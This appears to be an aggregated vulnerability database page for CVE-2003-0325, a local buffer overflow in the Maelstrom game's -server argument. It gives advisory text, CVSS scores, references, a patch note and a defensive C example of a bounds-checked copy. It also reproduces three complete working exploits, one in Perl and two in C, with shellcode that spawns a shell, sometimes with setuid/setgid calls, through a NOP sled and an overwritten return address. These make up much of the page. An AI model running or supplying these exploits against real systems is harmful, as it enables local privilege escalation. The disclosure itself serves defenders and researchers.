CVE-2003-0325
CVSS 4.6
Published: 2003-06-09 00:00:00
Revised: 2016-10-17 22:32:29

[Original] Buffer overflow in Maelstrom 3.0.6, 3.0.5, and earlier allows local users to execute arbitrary code via a long -server command line argument.


[CNNVD] Maelstrom Server Argument Local Buffer Overflow Vulnerability (CNNVD-200306-046)

        
        Maelstrom is an online game program.
        Maelstrom performs insufficient bounds checking on user-supplied arguments. A local attacker can exploit this to cause a buffer overflow and may execute arbitrary commands on the system with the privileges of the 'games' group.
        Passing an overly long string as an argument to the '/usr/bin/Maelstrom' program triggers the overflow; carefully crafted input may execute arbitrary commands with 'games' group privileges.
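As an added illustration of the bug class this entry describes, not Maelstrom's own code (the page shows none of it): a hypothetical -server argument parser in C with the unchecked strcpy() copy beside a length-checked one that refuses oversized values. SERVER_NAME_MAX, the function names and the argv layout are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical reconstruction of the bug class (not Maelstrom's own source,
 * which this page does not show): the -server value lands in a fixed buffer. */
#define SERVER_NAME_MAX 64

/* Vulnerable pattern: strcpy() trusts the argument length, so a value longer
 * than dst overruns the stack. Shown for comparison only; never call it on untrusted input. */
void set_server_unchecked(char *dst, const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: measure first, reject what does not fit with its terminator,
 * and only then copy. Returns 0 on success, -1 when the argument is rejected. */
int set_server_checked(char *dst, size_t cap, const char *arg)
{
    size_t n = strlen(arg);
    if (cap == 0 || n >= cap)
        return -1;               /* would overflow: refuse rather than truncate silently */
    memcpy(dst, arg, n + 1);     /* n < cap, so the NUL terminator fits */
    return 0;
}

/* Scans an argv-style vector for "-server <host>" as a command-line parser would
 * and stores the value through the checked copy. Returns 0 if stored, 1 if
 * -server is absent, -1 if it has no value or the value is too long. */
int parse_server_arg(int argc, char *const argv[], char *server_out, size_t cap)
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-server") != 0)
            continue;
        if (i + 1 >= argc)
            return -1;
        return set_server_checked(server_out, cap, argv[i + 1]);
    }
    return 1;
}

int main(int argc, char *argv[])
{
    char server[SERVER_NAME_MAX];
    int rc = parse_server_arg(argc, argv, server, sizeof server);
    if (rc == 0)
        printf("server = %s\n", server);
    else if (rc < 0)
        fprintf(stderr, "-server rejected: missing value or over %d bytes\n", SERVER_NAME_MAX - 1);
    return rc < 0;
}
```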
        

- CVSS (Base Score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

cpe:/a:ambrosia_software:maelstrom:3.0.6
cpe:/a:ambrosia_software:maelstrom:3.0.5

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0325
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0325
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200306-046
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=105337792703887&w=2
(UNKNOWN)  BUGTRAQ  20030518 Maelstrom Buffer Overflow
http://marc.info/?l=bugtraq&m=105344501331344&w=2
(UNKNOWN)  BUGTRAQ  20030519 Maelstrom exploit
http://marc.info/?l=bugtraq&m=105346309123217&w=2
(UNKNOWN)  BUGTRAQ  20030520 Maelstrom Local Buffer Overflow Exploit, FreeBSD 4.8 edition

- Vulnerability Information

Maelstrom Server Argument Local Buffer Overflow Vulnerability
Medium severity  Boundary condition error
2003-06-09 00:00:00 2005-10-20 00:00:00
Local
        

- Advisories and Patches

        Vendor patch:
        Sam Lantinga
        ------------
        The vendor has released an upgrade patch to fix this security issue; download it from the vendor's homepage:
        Andrew Church Patch maelstrom-3.06.patch

        http://downloads.securityfocus.com/vulnerabilities/patches/maelstrom-3.06.patch

- Vulnerability Information (22613)

Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (1) (EDBID:22613)
freebsd local
2003-05-20 Verified
0 Luca Ercoli
N/A
source: http://www.securityfocus.com/bid/7630/info

Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.

The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games. 

#!/usr/bin/perl
# kokanin/DSR, gid games crap for /usr/ports/games/maelstrom -server bug found by
# Luca Ercoli. This (ret/offset/shellcode) is made for FreeBSD 4.8-RELEASE.
# maelstrom-3.0.5     Asteroids-style game for X Window System
# shellcode by eSDee, he's cool. AV crap + .pl files + mailinglists == flooded mbox #¤%
$len = 1000;                      # total size of the NOP sled plus shellcode
$ret = pack("l",0xbfbffb7f);      # return address, little-endian
$nop = "\x90";
$offset = 0;
$shellcode =    "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
                "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
                "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

# NOP sled followed by the shellcode, handed to the child via the EGG environment variable
for ($i = 0; $i < $len - length($shellcode); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
local($ENV{'EGG'}) = $buffer;
$cakeman = "1\@A" . $ret x 255 ;  # the oversized -server argument
exec("/usr/X11R6/bin/Maelstrom  -server $cakeman");


- Vulnerability Information (22614)

Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (2) (EDBID:22614)
freebsd local
2003-05-23 Verified
0 ph4nt0m
N/A
source: http://www.securityfocus.com/bid/7630/info
 

/*  /usr/bin/Maelstrom local exploit
*** Sorry for my poor English.
*** Other exploits can't exploit my Maelstrom, so I wrote this exploit just for fun.
*** I can't get a root shell on my Linux, because it's not SUID.
*** If it is SUID, this exploit can make you get a root shell.
*** Tested on Red Hat 9.0; other Linux maybe OK, too.
***
*** Thanks netric's good paper.
*** You can download it here:
*** http://www.netric.org/papers/envpaper.pdf
*** This paper made me write this exploit so it doesn't need to guess ret.
*** Thanks jsk and axis for their help.
***
*** CONTACT:OYXin@ph4nt0m.net
*** COPYRIGHT (c) 2003 PH4NT0M SECURITY
*** http://www.ph4nt0m.net
*** 2003.5.23

Coded by OYXin(ph4nt0m)
Welcome to http://www.ph4nt0m.net

*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>

#define  bufsize 8179

/*  linux x86 shellcode by bob from dtors.net, 23 bytes, thx them.  */
static char shellcode[] =
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x17"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x2e"
    "\xcd\x80"
    "\x31\xc0"
    "\x50"
    "\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x62\x69\x6e"
    "\x89\xe3"
    "\x50"
    "\x53"
    "\x89\xe1"
    "\x31\xd2"
    "\xb0\x0b"
    "\xcd\x80"
    "\x31\xdb"
    "\x89\xd8"
    "\xb0\x01"
    "\xcd\x80";

int main(int argc, char *argv[]){
    char buf[bufsize+1];
    char *prog[]={"/usr/bin/Maelstrom","-server",buf,NULL};
    /* the shellcode is passed in the environment, not in the argument */
    char *env[]={"HOME=/root",shellcode,NULL};
    unsigned long ret;

    /* address of the shellcode string at the top of the new process stack */
    ret=0xc0000000-sizeof(void*)-strlen(prog[0])-strlen(shellcode)-0x02;

    memset(buf, 0x90, bufsize);
    memset(buf,0x32,sizeof("1"));
    memset(buf+1,0x40,sizeof("1"));
    memcpy(&buf[bufsize-(sizeof(ret))], &ret, sizeof(ret));
    memcpy(&buf[bufsize-(2*sizeof(ret))], &ret,sizeof(ret));
    memcpy(&buf[bufsize-(3*sizeof(ret))], &ret,sizeof(ret));
    memcpy(&buf[bufsize-(4*sizeof(ret))], &ret,sizeof(ret));
    buf[bufsize] = '\0';

    execve(prog[0],prog,env);

    return  0;
}


- Vulnerability Information (22615)

Maelstrom Server 3.0.x Argument Buffer Overflow Vulnerability (3) (EDBID:22615)
freebsd local
2003-05-20 Verified
0 CMN
N/A
source: http://www.securityfocus.com/bid/7630/info
  

/*
 * Maelstrom exploit By CMN <cmn@darklab.org>
 *
 * Tested on
 *
 * Maelstrom v1.4.3 (GPL version 3.0.6)
 *  from Maelstrom-3.0.6-1.i386.rpm
 *
 * Maelstrom v1.4.3 (Linux version 3.0.3)
 *  from Gentoo port
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>
#include <sys/types.h>

#define TARGET    "/usr/bin/Maelstrom"
#define BUFSIZE    8179
#define NOP        0x90
#define OFFSET     100

static char linux_code[] =
    "\xb9\xff\xff\xff\xff" /* movl    $-1, %ecx   */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x31"             /* movb    $0x31, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x46"             /* movb    $0x46, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\xb0\x32"             /* movb    $0x32, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x89\xc3"             /* movl    %eax, %ebx  */
    "\xb0\x47"             /* movb    $0x47, %al  */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xd2"             /* xorl    %edx, %edx  */
    "\x52"                 /* pushl   %edx        */
    "\x68\x2f\x2f\x73\x68" /* pushl   $0x68732f2f */
    "\x68\x2f\x62\x69\x6e" /* pushl   $0x6e69622f */
    "\x89\xe3"             /* movl    %esp, %ebx  */
    "\x52"                 /* pushl   %edx        */
    "\x53"                 /* pushl   %ebx        */
    "\x89\xe1"             /* movl    %esp, %ecx  */
    "\xb0\x0b"             /* movb    $0xb, %al   */
    "\xcd\x80"             /* int     $0x80       */
    "\x31\xc0"             /* xorl    %eax, %eax  */
    "\x40"                 /* inc     %eax        */
    "\xcd\x80";            /* int     $0x80       */

int
main(int argc, char *argv[])
{
    int ret = (u_long)(&ret);        /* start from this process's own stack address */
    char *target = TARGET;
    u_char buf[BUFSIZE+1];
    long offset = 0;
    int i;

    memset(buf, NOP, BUFSIZE);
    buf[BUFSIZE] = '\0';
    buf[0] = '2';
    buf[1] = '@';
    memcpy(&buf[BUFSIZE-(strlen(linux_code)+4*sizeof(ret))],
        linux_code, strlen(linux_code));

    while ( (i = getopt(argc, argv, "t:o:")) != -1) {

        switch(i) {
            case 't':
                target = optarg;
                break;

            case 'o':
                offset = strtol(optarg, NULL, 0);
                break;

            default:
                printf("\nUsage: %s [-t target ] [-o offset]\n\n", argv[0]);
                exit(EXIT_FAILURE);
        }
    }

    ret -= offset ? offset : OFFSET;
    memcpy(&buf[BUFSIZE-(sizeof(ret))], &ret, sizeof(ret));
    memcpy(&buf[BUFSIZE-(2*sizeof(ret))], &ret, sizeof(ret));
    memcpy(&buf[BUFSIZE-(3*sizeof(ret))], &ret, sizeof(ret));
    memcpy(&buf[BUFSIZE-(4*sizeof(ret))], &ret, sizeof(ret));

    printf("Using address 0x%08lx\n", (unsigned long)ret);
    printf("Target is '%s'\n", target);
    execlp(target, "CMN", "-server", buf, (char *)NULL);
    perror("execlp()");
    exit(EXIT_FAILURE);
}


- Vulnerability Information

8441
Maelstrom -server Command-Line Argument Overflow
Input Manipulation
Loss of Integrity

- Vulnerability Description

Unknown or Incomplete

- Timeline

2003-05-18 Unknown
2003-05-20 Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Maelstrom Server Argument Buffer Overflow Vulnerability
Boundary Condition Error 7630
No Yes
2003-05-20 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Luca Ercoli <luca.ercoli@inwind.it>.

- Affected Program Versions

Sam Lantinga Maelstrom 3.0.6
Sam Lantinga Maelstrom 3.0.5
Sam Lantinga Maelstrom 3.0.3

- Vulnerability Discussion

Maelstrom for Linux has been reported prone to a buffer overflow vulnerability.

The issue is reportedly due to a lack of sufficient bounds checking performed on user-supplied data before it is copied into an internal memory space. It may be possible for a local attacker to exploit this condition and have malicious arbitrary code executed in the context of the Maelstrom application. Typically setGID games.

- Exploit

The following proof of concept exploits have been submitted by CMN <cmn@darklab.org> and kokanin <kain@ircop.dk> respectively:

- Solution

Andrew Church has supplied an unsupported unofficial patch to address this issue for maelstrom version 3.0.6.

Gentoo has released an advisory for this issue. Gentoo can apply the app-games/maelstrom upgrade to maelstrom-3.0.6 with the following commands:

emerge sync
emerge maelstrom
emerge clean


Sam Lantinga Maelstrom 3.0.6

- Related References

 

 
